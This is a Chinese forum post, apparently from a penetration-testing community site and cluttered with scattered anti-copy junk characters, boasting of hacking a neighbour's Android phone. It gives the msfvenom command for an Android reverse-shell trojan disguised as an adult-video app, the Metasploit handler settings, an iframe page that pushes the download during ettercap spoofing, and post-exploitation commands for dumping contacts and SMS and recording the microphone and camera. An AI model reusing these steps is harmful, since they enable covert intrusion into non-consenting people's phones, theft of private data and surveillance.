中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

; G; a5 r% |( E& [ 五、msf+ettercap入侵邻居安卓手机 7 j7 S- `$ [" ]& A _6 }/ u

; {9 t, T: v) L. I9 _, O# n

. i2 A% _$ X5 \) b 首先启动msf * f% F8 Q# L6 ]& b* b7 m. d

) ]% R1 h9 r. O% W/ _4 }; F t0 J

# d# G5 `1 R* D: X* f; j3 U 先用kali生成一个安卓木马,如下命令: 5 W/ I, Y! @0 Z& _: m6 [7 W" R; ^

9 k+ p, n1 e* g3 t

6 S! q+ [; i' H: r6 r# a Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 9 I; `9 s" k R' h: Q' d7 i

$ U! \# |% Q) B7 J8 I/ ?

0 ` H. l1 f; A8 u 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 + e7 \8 j* c, ?- D

7 ^) O+ N, {; v0 [

3 m6 ?8 B9 B+ R& Z; g3 ^7 L 然后进入msf 8 t$ m9 _* Q) z( H2 l S

; ?5 f* @# s( I4 s+ R3 r( B8 v0 P

5 @" Z- S8 g2 I# g; w* I/ X! l use exploit/multi/handler / d: I& o8 h" k, O N

- |: _ w) |! U3 x e; j) K

4 G- E0 w! x2 r V2 S/ }! X4 U D set payload android/meterpreter/reverse_tcp , Q U7 r# s2 O; w* ^

2 v7 k% r9 z4 d0 I6 c

6 L1 C, T+ S. A k; \5 h B set LHOST 192.168.0.109 //ipkailiip 9 q; o8 P8 n1 Z' e

6 ?9 f; T. R- r+ [

* W2 J; J- T6 e( J0 ]+ \3 L set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : A5 b M" a: }5 } S0 W$ `

0 B, B, o( M. M+ m3 d

4 h2 V( g- z; R8 c Exploit , ^9 D3 r A( w+ I' h8 l$ d8 F1 m

1 }2 J7 |5 Z8 ^9 N# t

3 t2 c3 O8 w! F/ K$ S) i9 p( J   4 p9 J1 f% L" f7 d

4 R; R& S$ l: H# N

$ B* x% }7 O1 l: `* r; J 下面我们开启ettercap -G 1 L$ @/ @- y* {3 G. C) g

" N2 z0 k+ D3 ]. S% [3 s5 L

8 p+ m/ n* i7 R0 W 我物理IP 1 p3 s& w' ] l( s. I. R

# ~9 O9 t) g8 A, |3 Q6 |

! x2 S; d# g2 x0 X% f   3 u! g3 m3 @& k. c0 p" ^

" k" A. c( t4 x* `6 G1 n

" \5 T G8 {% H: g. W% q2 t 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ! E$ J+ x: e5 D8 P- L2 F. I& Y

) f% F; v: Z) l1 v" X2 L0 f

( c4 t, E; X! I 下面我们来设置一下 , j* k. p- _. v& D6 w

. V& \2 M( W! R) a3 e0 y

+ S( E) s5 |! b& L8 R   7 r2 p. c$ Q8 y7 E

; ~0 q& S# w$ M8 @2 k; K5 ^

- e, ~( X! e% |6 Q" J/ C& r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 0 S3 a V1 A. O, [8 s+ E! E# E+ C

4 K, ?8 o! s, a$ j

' u9 f, I) z7 U& Q; R2 H   : {* j( h, r. c, }/ }: I* Q

9 k8 }1 b( y8 u3 n5 U% ~: N2 r

3 \# a! s) t. v& q2 p( \" Q   ; ~) Q' G9 ]$ e. z% D* H

' \8 ?4 x1 w! d

# F$ ?: h- e' C   / ] ^2 }$ k7 l1 L8 y& O6 H

1 g# L$ k! i- {& s, a" Z7 v

+ E+ @: P9 A: H; q; t   ( i7 U0 i3 f' Y0 \2 v) |) I

, e4 {& O, Y0 R' K1 g' g$ D

3 |0 @, s! n8 }; s% g$ W4 w( O4 [   6 W. C' q. p$ f9 a( a) W

& K6 P3 |/ j$ Q) S! J! ^

$ A9 _5 ^3 _7 |, y   ' M1 Q* ?4 C* l- t& m

" _$ o d' L i8 i7 A' b

$ ?3 l; R9 V' Z4 E- O7 S _2 c# g   4 `9 n6 O" W) f0 F4 z7 p& w

3 f7 ^$ j" K3 b, P q

# W9 |' W! r+ T7 C6 J' T: N   % \% @- u8 W, X7 ~. q+ d/ ]

+ z( b1 ]0 _) N S3 I$ a. d

5 a: ~' l: N1 Y3 u   0 ^( U7 S1 {0 l+ Y. G

4 ~/ R1 Y# i. X6 R1 h% E7 [4 v

: q3 E1 ]2 g! Q8 b: E: m' p   $ V+ L) c# f/ @! c5 B

% A+ d) u$ v8 k; o! ~% _/ j4 B

' f+ k, J2 b" J   ! H2 k+ m; y$ x. r% W& Z2 a- i

. l9 g. l5 M( }5 A' |5 V8 W

4 H1 m0 E! I& g# s4 |   - t" @" Y* e" ~9 k

' I9 L: n W) s- {

% z5 T0 x% s! M: C0 I   ( v$ l5 I, c6 [. g* Z! x9 [3 C& w# ~* h

1 G; b! [( S) Y; T

" s8 q+ c$ A( Y# }- W 下面我们开始攻击 ( l! n# q3 j R f, K& b3 v

' g$ I* }* a* L) Q

6 @4 u# O4 A D! R8 k/ H   ' K, l7 E0 w& | l* b$ \" R* T$ Z

; R2 V; p2 V5 V1 |/ @2 T- P, v* W1 H

! V) M/ U+ u: a( u/ z0 s$ ^* c h& {   9 @, A0 h9 H* _

8 \6 Z/ O5 a+ T

8 T/ W$ I# o7 ?4 h5 e: | F0 I   6 F0 W7 m# @& s8 G+ ^, a" v

- M6 M2 I- g2 @% D% P8 h7 y

/ ~2 I+ J! }& o! u. w' x   $ Z# v4 X3 ^. q& S

5 C! Z$ e! Z7 S4 c% U

$ x: D9 x+ L' g4 {! F3 T& K   * D$ W6 v- b: }; C

, W7 k9 Z$ ?' ~$ `

# R9 m0 q2 a2 B+ g0 _, d [, } 大概过了5分钟多,发现反弹成功了 : E, x4 F# H: _: u& V* @& p& b% a% ?

$ Z5 o! X$ H) w

& p/ ~& @/ ]3 k; k5 F0 I0 Q9 ~; V   5 o6 k# R9 a- n2 |# w; ?+ C

( G6 P: _5 s0 h

3 P0 G" C+ J o! L$ C2 q   % H- J0 a& v+ E1 }/ J2 ?! o4 M- C2 ~7 l

3 ^2 J5 z9 M! n* u1 V

. c1 L1 {5 T. t6 D* U% F   : _7 T+ P- Z& f! Z, N- }7 M. v

' ]2 ?% d& R( j

+ Z8 t0 @/ ~1 n4 m+ \9 v   7 A6 ]7 k9 l: W. c* ~

. m m! o$ g; W. Q8 a+ ]

9 g' @" D, I* D   2 Z: o9 x) r& j: G( F

; n' V ?6 S, M/ [6 |8 u* y4 U4 r

3 ~# J, m2 H8 b* P   + {; @& n; `7 _" v/ G( s' L! |

0 B7 @# m8 J) \) _3 D0 L* Q. [

T" M4 c. n+ ^8 \7 m7 h" e- N# |   1 P1 t& Q. W% a) }* B/ k, ?1 X. Z

- }% D' @! B6 d$ ]) W; h, |: y! U4 ?

4 q( i% ^5 k& D 执行命令 / o6 R; b- E# t: K% @

U* z# u5 ?- G* N3 H! I; b

: e3 \5 C+ @8 {9 P. }0 i. j$ c. e   ( L- s! M& P3 Z4 O% g8 {) h/ c: V

, {- w1 n9 ?+ r0 F9 h

) R. P" W; T& R( J4 \+ H dump_contacts    --》这个是导出电话 % A( K4 X! h# f, g

) o+ d" M7 \3 i1 t

- q2 n/ U! |1 r# | dump_sms --》这个是导出信息 8 C4 ? ~, Z( J' y- E

9 q2 J( G& G5 j1 Y7 i0 Z( n3 i

( m- s9 C5 J, V* s4 ] record_mic     Record audio from the default microphone for X seconds 1 z9 n! G0 ?5 ~, S P7 p

: l$ ]3 c$ ?9 i; J0 \' D$ b2 c8 C

' f8 s x8 C- j9 R     webcam_chat    Start a video chat 6 I+ S7 q1 I3 V: J0 ?: f& w

/ I0 Q) m" \3 T% V4 m( f

4 Y& D0 u; o- b8 r     webcam_list    List webcams 4 N5 y- y2 t, y2 @

8 ]0 K8 |4 X1 x. L

4 G: F# t, J, D+ ]$ S, U0 T     webcam_snap    Take a snapshot from the specified webcam # u5 S6 f% e i2 A

$ B# i1 ?" M8 V1 {7 G

9 G( d# c1 p m O9 q0 M ^1 |$ y webcam_stream  lay a video stream from the specified webcam - B9 N# U: }$ i" G+ K& Y- m' `, ]

% A+ f; X4 ]0 n: Z) n

$ [2 }9 k& D8 b9 w: d& n* C   % f% k, I" G. [

9 H; a" W( t' I

5 t" t$ j! d4 z$ L9 }* Y' P   G0 o( P* q, b) W: F9 q/ l

6 i9 S8 ]0 Z& ^3 h

0 X, N# c9 Y0 E9 J- [/ Z 我们打开看一下电话薄, 9 P- l$ B4 T+ z3 s

7 b# Y/ j5 I$ m/ {" n* b3 Y, C

# a* N- Z, i( s0 G7 a   0 s9 U2 E, |% b; J

8 ]: P+ b' }$ e6 B) O* c# _

; p9 `5 s! G9 b4 N4 g   , o! b" j7 m# W; c, v& K/ N

u* W# {/ ], M! X) E4 s* o

/ _; ~ p2 |$ |& {, |1 a   & N+ w) R) l1 Y1 H* X# b9 K# w) k7 X

H% S% g" |7 w

_( H0 D2 A! G& P* q. `" K   , I' |. B5 ^, i

+ X0 O5 L) i7 g& k" q" K5 f$ V1 V

( r7 E! Z! e. v: E) p* A& v   ' d, Y- }( B0 @& `7 B) H

7 {/ ~% k8 |) `- T- s3 S' _3 T

2 r( \. y6 p* q2 u6 `2 P   ; T) A) l* ^$ k2 k5 i

8 x- h5 x6 [" ]7 S% ^

( ?% w- u: I+ p( I 我们同时欺骗成DroidJack木马,使用方法如图: / L' P2 O& Y9 d* ^; c1 h8 A" h

: ~& O6 t* |+ m: a, H4 }! H$ m8 c: s9 Q

0 y2 A+ I Y1 L+ a2 r+ y9 N   . _# n, ~5 s4 A( U2 G2 P6 P

! o8 {5 e" S; y. V+ U3 F

6 t- k6 H: ^& K8 e   . P; B! z: p4 U

& E/ q# h& H" s5 L

_+ X0 c0 f7 }% O2 ?$ h! P   $ i5 @* m6 N, q |+ }& _

: d% @7 j! @! I& ~

# E: [) F1 }9 j2 l' E9 h 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ; r3 C% f3 S# [7 k2 Q

* n6 y1 r% m3 s+ _0 e5 F

) A, l7 n. N1 M W7 a$ @   ( p* o: y" X s7 b: o7 i5 c

+ i7 I A: D/ d5 f8 z5 C

% r+ p" L) w9 `: v/ b3 U   / |& }- c/ Q; y5 Y2 J; `' V3 [5 {3 f/ T

/ U( p3 w" N) E

% V. o* j! O0 \% a- S   # T6 h' i4 R7 e

3 I( q; S; w3 r+ H$ G

/ p$ i R' q9 G/ C. E 9 I* n' A+ q6 @! Z9 S6 e' P

+ O! ~, F7 t+ B- q& u" B: L' F, L4 X

6 v0 b( ^" ]8 g/ }
& E+ a2 g6 R ]2 S





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2